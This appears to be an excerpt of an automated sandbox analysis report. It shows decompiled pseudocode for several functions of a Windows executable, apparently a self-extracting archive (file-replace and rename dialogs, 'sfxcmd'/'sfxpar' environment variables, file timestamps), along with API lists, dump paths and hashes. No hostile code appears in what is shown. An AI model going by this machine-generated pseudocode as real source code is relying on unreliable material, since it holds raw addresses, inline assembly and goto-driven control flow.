                Uniqueness Score: -1.00%

                Function 003EDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EDCDD(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				WCHAR* _t15;
				_Unknown_base(*)()* _t19;
				int _t22;

				 *0x42ec88 = _a12;
				 *0x42ec8c = _a16;
				 *0x418464 = _a20;
				if( *0x418460 == 0) {
					if( *0x418457 == 0) {
						_t19 = E003EC220;
						_t15 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x41102c, _t15,  *0x418458, _t19, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x411028, L"RENAMEDLG",  *0x418450, E003ED600, _a4) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}






                0x003edced
                0x003edcf5
                0x003edcfb
                0x003edd00
                0x003edd0d
                0x003edd17
                0x003edd1c
                0x003edd46
                0x003edd5d
                0x003edd62
                0x00000000
                0x00000000
                0x003edd44
                0x00000000
                0x00000000
                0x003edd44
                0x00000000
                0x003edd68
                0x00000000
                0x003edd11
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: 8d1b9386bc134b11be9d80eb0ae3ed324dbaf97fd2e366575c400c0a929a2816
                • Instruction ID: 60952b21bc5eb11d0b99fde60e4e5991a52de935eac2566ee927873a4db609eb
                • Opcode Fuzzy Hash: 8d1b9386bc134b11be9d80eb0ae3ed324dbaf97fd2e366575c400c0a929a2816
                • Instruction Fuzzy Hash: 1A01B575604299AFDB129F96FC44A9B7FA9FB48354B104539F505D32B0DB308850DBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D1316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E003D1316(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E003DE2C1(0x411030, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E003DE2E8(0x411030, __edx, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x433154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x4035f4);
								}
							}
						}
					}
				}
				return 0;
			}





                0x003d131d
                0x003d1380
                0x003d131f
                0x003d131f
                0x003d1326
                0x003d133c
                0x003d1345
                0x003d134a
                0x003d1352
                0x003d135a
                0x003d1362
                0x003d1370
                0x003d1370
                0x003d1362
                0x003d1352
                0x003d1345
                0x003d1326
                0x003d1388

                APIs
                  • Part of subcall function 003DE2E8: _swprintf.LIBCMT ref: 003DE30E
                  • Part of subcall function 003DE2E8: _strlen.LIBCMT ref: 003DE32F
                  • Part of subcall function 003DE2E8: SetDlgItemTextW.USER32(?,0040E274,?), ref: 003DE38F
                  • Part of subcall function 003DE2E8: GetWindowRect.USER32(?,?), ref: 003DE3C9
                  • Part of subcall function 003DE2E8: GetClientRect.USER32(?,?), ref: 003DE3D5
                • GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                • SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: >$0
                • API String ID: 2622349952-1514486133
                • Opcode ID: 645cdbd41ef2e54f20b70c3fc2fef2407325123c4725652d178455543275b1ae
                • Instruction ID: ae3e5e7a92f068dd8d4ef74c2fcad9b06053ff7498738de14199bb6317b2d7fa
                • Opcode Fuzzy Hash: 645cdbd41ef2e54f20b70c3fc2fef2407325123c4725652d178455543275b1ae
                • Instruction Fuzzy Hash: 79F0AF3610438CBBEF171F60AC0DBEA3F58AF04346F058526FD4454AA1CBB8C990EA14
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 63%
                			E003EDBDE(void* __eflags, WCHAR* _a4) {
				char _v8196;
				WCHAR* _t8;
				WCHAR* _t13;

				E003EEC50(0x2000);
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t8 = E003E0371(_a4,  &_v8196, 0x1000);
				_t13 = _t8;
				if(_t13 != 0) {
					_push( *_t13 & 0x0000ffff);
					while(E003E048D() != 0) {
						_t13 =  &(_t13[1]);
						_push( *_t13 & 0x0000ffff);
					}
					return SetEnvironmentVariableW(L"sfxpar", _t13);
				}
				return _t8;
			}






                0x003edbe6
                0x003edbf4
                0x003edc09
                0x003edc0e
                0x003edc12
                0x003edc17
                0x003edc21
                0x003edc1a
                0x003edc20
                0x003edc20
                0x00000000
                0x003edc30
                0x003edc38

                APIs
                • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 003EDBF4
                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003EDC30
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 003d416803be72cc8055ca0e0ec2a6b718bc59d0368ee08b3253d3ce829295bd
                • Instruction ID: 8de0d06d6fc7c21430e2038fd159024c102378214b82c8792997dd18ab0df09c
                • Opcode Fuzzy Hash: 003d416803be72cc8055ca0e0ec2a6b718bc59d0368ee08b3253d3ce829295bd
                • Instruction Fuzzy Hash: A3F0A772404274A6CF222F968D06BEB3B5CEF08782B140561BD85AD0D1D6F48980DAB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 75%
                			E003F9A1E(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E003F4636(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E003EEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E003EEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x3f52a1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E003EFFF0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E003EEE10( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00402260();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00402260();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00402260();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E003F9D21(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00402430(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E003F91A8();
					_t183 = 0x22;
					 *_t129 = _t183;
					E003F9087();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                0x003f9a1e
                0x003f9a29
                0x003f9a30
                0x003f9a32
                0x003f9a32
                0x003f9a34
                0x003f9a3d
                0x003f9a3f
                0x003f9a44
                0x003f9a4a
                0x003f9a60
                0x003f9a65
                0x003f9a68
                0x003f9a75
                0x003f9a7a
                0x003f9ace
                0x003f9ad6
                0x003f9ad8
                0x003f9ada
                0x003f9add
                0x003f9add
                0x003f9add
                0x003f9ae3
                0x003f9aeb
                0x003f9afe
                0x003f9b01
                0x003f9b03
                0x003f9b06
                0x003f9b07
                0x003f9b28
                0x003f9b2b
                0x003f9b2b
                0x003f9b09
                0x003f9b09
                0x003f9b0b
                0x003f9b16
                0x003f9b16
                0x003f9b18
                0x003f9b1f
                0x003f9b1a
                0x003f9b1a
                0x003f9b1a
                0x003f9b18
                0x003f9b2c
                0x003f9b2e
                0x003f9b2f
                0x003f9b32
                0x003f9b34
                0x003f9b48
                0x003f9b36
                0x003f9b36
                0x003f9b36
                0x003f9b4d
                0x003f9b4d
                0x003f9b52
                0x003f9b55
                0x003f9b60
                0x003f9b60
                0x003f9b60
                0x003f9b60
                0x003f9b64
                0x003f9b6b
                0x003f9b6c
                0x003f9b6f
                0x003f9b72
                0x003f9b72
                0x003f9b74
                0x00000000
                0x00000000
                0x003f9b8c
                0x003f9b93
                0x003f9b97
                0x003f9b9a
                0x003f9b9d
                0x003f9b9f
                0x003f9b9f
                0x003f9b9f
                0x003f9ba1
                0x003f9ba4
                0x003f9ba7
                0x003f9ba9
                0x003f9bb1
                0x003f9bb7
                0x003f9bba
                0x003f9bbd
                0x003f9bbe
                0x003f9bc1
                0x003f9bc4
                0x003f9bc4
                0x003f9bc9
                0x003f9bcc
                0x00000000
                0x00000000
                0x003f9be4
                0x003f9be9
                0x003f9bed
                0x00000000
                0x00000000
                0x003f9bf1
                0x003f9bf1
                0x003f9bf4
                0x003f9bf5
                0x003f9bf5
                0x003f9bf7
                0x003f9bfa
                0x00000000
                0x00000000
                0x003f9bfc
                0x003f9bff
                0x003f9c06
                0x003f9c09
                0x003f9c0c
                0x003f9c22
                0x003f9c22
                0x003f9c22
                0x003f9c0e
                0x003f9c0e
                0x003f9c10
                0x003f9c13
                0x003f9c1e
                0x003f9c15
                0x003f9c18
                0x003f9c18
                0x003f9c13
                0x00000000
                0x003f9c0c
                0x003f9c01
                0x003f9c01
                0x003f9c03
                0x003f9c03
                0x003f9b57
                0x003f9b57
                0x003f9b5a
                0x003f9c25
                0x003f9c25
                0x003f9c27
                0x003f9c29
                0x003f9c2c
                0x003f9c2d
                0x003f9c2e
                0x003f9c2f
                0x003f9c37
                0x003f9c37
                0x003f9c37
                0x003f9c39
                0x003f9c3c
                0x003f9c3f
                0x003f9c41
                0x003f9c41
                0x003f9c43
                0x003f9c55
                0x003f9c59
                0x003f9c5c
                0x003f9c63
                0x003f9c6b
                0x003f9c6b
                0x003f9c6e
                0x003f9c70
                0x003f9c81
                0x003f9c81
                0x003f9c85
                0x003f9c85
                0x003f9c88
                0x003f9c8a
                0x003f9c8d
                0x00000000
                0x003f9c72
                0x003f9c72
                0x003f9c78
                0x003f9c78
                0x003f9c7c
                0x003f9c8f
                0x003f9c8f
                0x003f9c93
                0x003f9c94
                0x003f9c96
                0x003f9c98
                0x003f9cd9
                0x003f9cd9
                0x003f9cdb
                0x003f9ce8
                0x003f9ce8
                0x003f9cea
                0x003f9cec
                0x003f9ced
                0x003f9cee
                0x003f9cf5
                0x003f9cf8
                0x003f9cfa
                0x003f9cfa
                0x003f9cfb
                0x003f9cfd
                0x003f9d00
                0x003f9d00
                0x003f9d02
                0x003f9d04
                0x00000000
                0x003f9d04
                0x003f9cdd
                0x003f9cdf
                0x00000000
                0x00000000
                0x003f9ce1
                0x00000000
                0x00000000
                0x003f9ce3
                0x003f9ce6
                0x00000000
                0x00000000
                0x00000000
                0x003f9ce6
                0x003f9c9f
                0x003f9ca5
                0x003f9ca5
                0x003f9ca7
                0x003f9ca8
                0x003f9ca9
                0x003f9caa
                0x003f9cb1
                0x003f9cb4
                0x003f9cb6
                0x003f9cb7
                0x003f9cb9
                0x003f9cc6
                0x003f9cc6
                0x003f9cc8
                0x003f9cca
                0x003f9ccb
                0x003f9ccc
                0x003f9cd3
                0x003f9cd6
                0x003f9cd8
                0x003f9cd8
                0x00000000
                0x003f9cd8
                0x003f9cbb
                0x003f9cbb
                0x003f9cbd
                0x00000000
                0x00000000
                0x003f9cbf
                0x00000000
                0x00000000
                0x003f9cc1
                0x003f9cc4
                0x00000000
                0x00000000
                0x00000000
                0x003f9cc4
                0x003f9ca1
                0x003f9ca3
                0x00000000
                0x00000000
                0x00000000
                0x003f9ca3
                0x003f9c74
                0x003f9c76
                0x00000000
                0x00000000
                0x00000000
                0x003f9c76
                0x003f9c70
                0x00000000
                0x003f9b5a
                0x003f9b55
                0x003f9a7c
                0x003f9a7e
                0x00000000
                0x003f9a80
                0x003f9a96
                0x003f9a9b
                0x003f9a9d
                0x003f9aa9
                0x003f9aaf
                0x003f9ab0
                0x003f9ab2
                0x003f9ab4
                0x003f9abf
                0x003f9abf
                0x003f9ac2
                0x003f9ac4
                0x003f9ac4
                0x003f9ac7
                0x003f9a9f
                0x003f9a9f
                0x003f9a9f
                0x00000000
                0x003f9a9d
                0x003f9a4c
                0x003f9a4c
                0x003f9a53
                0x003f9a54
                0x003f9a56
                0x003f9d08
                0x003f9d0c
                0x003f9d11
                0x003f9d11
                0x003f9d20
                0x003f9d20

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                • Instruction ID: b465e45cfd128809234f6e44bb79c42bbc82d6ec9c656b99e812ee81e0c15a22
                • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                • Instruction Fuzzy Hash: 9FA1267290438A9FEB27CF68C8917BEBBE5EF55310F2541AFE6859B281C2398D41C750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E003DA354(void* __edx) {
				signed char _t41;
				void* _t42;
				void* _t53;
				signed char _t70;
				void* _t78;
				signed int* _t79;
				signed int* _t80;
				void* _t81;
				signed int* _t82;
				void* _t83;

				_t78 = __edx;
				E003EEC50(0x1024);
				_t80 =  *(_t83 + 0x1038);
				_t70 = 1;
				if(_t80 == 0) {
					L2:
					 *(_t83 + 0x11) = 0;
					L3:
					_t79 =  *(_t83 + 0x1040);
					if(_t79 == 0) {
						L5:
						 *(_t83 + 0x13) = 0;
						L6:
						_t82 =  *(_t83 + 0x1044);
						if(_t82 == 0) {
							L8:
							 *(_t83 + 0x12) = 0;
							L9:
							_t41 = E003DA243( *(_t83 + 0x1038));
							 *(_t83 + 0x18) = _t41;
							if(_t41 == 0xffffffff || (_t70 & _t41) == 0) {
								_t70 = 0;
							} else {
								E003DA4ED( *((intOrPtr*)(_t83 + 0x103c)), 0);
							}
							_t42 = CreateFileW( *(_t83 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t83 + 0x14) = _t42;
							if(_t42 != 0xffffffff) {
								L16:
								if( *(_t83 + 0x11) != 0) {
									E003E138A(_t80, _t78, _t83 + 0x1c);
								}
								if( *(_t83 + 0x13) != 0) {
									E003E138A(_t79, _t78, _t83 + 0x2c);
								}
								if( *(_t83 + 0x12) != 0) {
									E003E138A(_t82, _t78, _t83 + 0x24);
								}
								_t81 =  *(_t83 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t81,  ~( *(_t83 + 0x1b) & 0x000000ff) & _t83 + 0x00000030,  ~( *(_t83 + 0x16) & 0x000000ff) & _t83 + 0x00000024,  ~( *(_t83 + 0x11) & 0x000000ff) & _t83 + 0x0000001c);
								_t53 = CloseHandle(_t81);
								if(_t70 != 0) {
									_t53 = E003DA4ED( *((intOrPtr*)(_t83 + 0x103c)),  *(_t83 + 0x18));
								}
								goto L24;
							} else {
								_t53 = E003DBB03( *(_t83 + 0x1040), _t83 + 0x38, 0x800);
								if(_t53 == 0) {
									L24:
									return _t53;
								}
								_t53 = CreateFileW(_t83 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t83 + 0x14) = _t53;
								if(_t53 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t83 + 0x12) = _t70;
						if(( *_t82 | _t82[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t83 + 0x13) = _t70;
					if(( *_t79 | _t79[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t83 + 0x11) = 1;
				if(( *_t80 | _t80[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                0x003da354
                0x003da359
                0x003da365
                0x003da36c
                0x003da370
                0x003da37d
                0x003da37d
                0x003da381
                0x003da381
                0x003da38a
                0x003da397
                0x003da397
                0x003da39b
                0x003da39b
                0x003da3a4
                0x003da3b2
                0x003da3b2
                0x003da3b6
                0x003da3bd
                0x003da3c2
                0x003da3c9
                0x003da3df
                0x003da3cf
                0x003da3d8
                0x003da3d8
                0x003da3fa
                0x003da400
                0x003da407
                0x003da451
                0x003da456
                0x003da45f
                0x003da45f
                0x003da469
                0x003da472
                0x003da472
                0x003da47c
                0x003da485
                0x003da485
                0x003da495
                0x003da499
                0x003da4a9
                0x003da4b9
                0x003da4bf
                0x003da4c6
                0x003da4ce
                0x003da4db
                0x003da4db
                0x00000000
                0x003da409
                0x003da41a
                0x003da421
                0x003da4e4
                0x003da4ea
                0x003da4ea
                0x003da43e
                0x003da444
                0x003da44b
                0x00000000
                0x00000000
                0x00000000
                0x003da44b
                0x003da407
                0x003da3ac
                0x003da3b0
                0x00000000
                0x00000000
                0x00000000
                0x003da3b0
                0x003da391
                0x003da395
                0x00000000
                0x00000000
                0x00000000
                0x003da395
                0x003da377
                0x003da37b
                0x00000000
                0x00000000
                0x00000000

                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,003D7F69,?,?,?), ref: 003DA3FA
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,003D7F69,?), ref: 003DA43E
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,003D7F69,?,?,?,?,?,?,?), ref: 003DA4BF
                • CloseHandle.KERNEL32(?,?,?,00000800,?,003D7F69,?,?,?,?,?,?,?,?,?,?), ref: 003DA4C6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 47c900ea35d046b06a6e4af3e08331dbfe13329c12d1a6b7dc96df7d97649d6a
